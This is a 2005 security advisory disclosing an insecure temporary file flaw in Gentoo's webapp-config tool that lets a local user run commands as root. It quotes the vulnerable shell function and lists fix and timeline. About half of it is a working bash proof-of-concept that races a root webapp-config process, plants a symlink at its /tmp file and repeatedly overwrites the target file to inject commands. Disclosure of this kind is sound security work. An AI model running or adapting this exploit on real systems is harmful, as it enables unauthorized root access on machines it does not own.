-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ######################################################### Gentoo webapp-config insecure temporary file creation Vendor: http://www.gentoo.org Advisory: http://www.zataz.net/adviso/webapp-config-05182005.txt Vendor informed: yes Exploit available: yes Impact : high Exploitation : low ######################################################### Gentoo webapp-config contain a security flaw wich could allow a malicious local user to execute command with root privileges. The vulnerability is due to an insecure temporary file creation. The exploitation require that the root user install, upgrade or delete Gentoo provided web application with the webapp-config tool. ########## Versions: ########## webapp-config < 1.10-r14 ########## Solution: ########## Upgrade to net-www/webapp-config 1.10-r14 ######### Timeline: ######### Discovered : 2005-05-07 Vendor notified : 2005-05-07 Vendor response : 2005-05-07 Vendor fix : 2005-05-08 Disclosure : ##################### Technical details : ##################### Vulnerable code : - ----------------- Begin line 2711 fn_show_postinst () { if [ ! -f "${MY_APPDIR}/postinst-en.txt" ]; then return fi local my_file="/tmp/$$.postinst.txt" fn_run_vars # we create a temporary file, so that we can expand the variables # that are used in the file echo "cat < "$my_file" cat "${MY_APPDIR}/postinst-en.txt" >> "$my_file" echo "webapp-EOF" >> "$my_file" # execute the temporary file, to generate the output echo . "$my_file" echo # it's a temporary file, so let's get rid of it now rm -f "$my_file" } ##### POC : ##### http://www.zataz.net/dev/webapp-poc.sh.txt ######### Related : ######### Bug report : https://bugs.gentoo.org/show_bug.cgi?id=91785 GLSA : Waiting for it ##################### Credits : ##################### Eric Romang (eromang@zataz.net - ZATAZ Audit) Thxs to Gentoo Security Team. (Taviso, jaervosz, solar, etc.) -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.1 (Darwin) iD8DBQFCkF9vXXuxWE8lDAcRAjSjAJ0e4O5D5H2CDWOBex+Aay2BCYVznwCfci+7 KGXba0qvTu5b20ABcBkABKQ= =7wI3 -----END PGP SIGNATURE----- #!/bin/bash # Eric Romang aka wow (eromang@zataz.net) # webapp-config race condition how permit execution of arbitrary command with root privileges # work with < webapp-config 1.10-r14 rm -f webapp-config_trace.txt fake_tmp_file /tmp/*.postinst.txt touch ~/fake_tmp_file echo "0" > webapp-config_trace.txt status=`cat webapp-config_trace.txt` echo "Waiting for webapp-config execution..." while [ "$status" == 0 ] do ps auxw|grep webapp-config|grep root if [ "$?" == 0 ] then echo "1" > webapp-config_trace.txt fi status=`cat webapp-config_trace.txt` done echo "Process caught !" process_id=`pgrep -u root webapp-config` ln -s ~/fake_tmp_file /tmp/$process_id.postinst.txt echo "fake_file_created!" echo "we force the file to be overwritten" echo "0" > webapp-config_trace.txt status=`cat webapp-config_trace.txt` echo "Waiting the end of webapp-config" echo "during all the configuration we force the file to be overwritten" while [ "$status" == 0 ] do ps auxw|grep webapp-config|grep root if [ "$?" == 1 ] then echo "1" > webapp-config_trace.txt else echo "echo premature end of script; exit 1;" > ~/fake_tmp_file fi status=`cat webapp-config_trace.txt` done echo "end of webapp-config"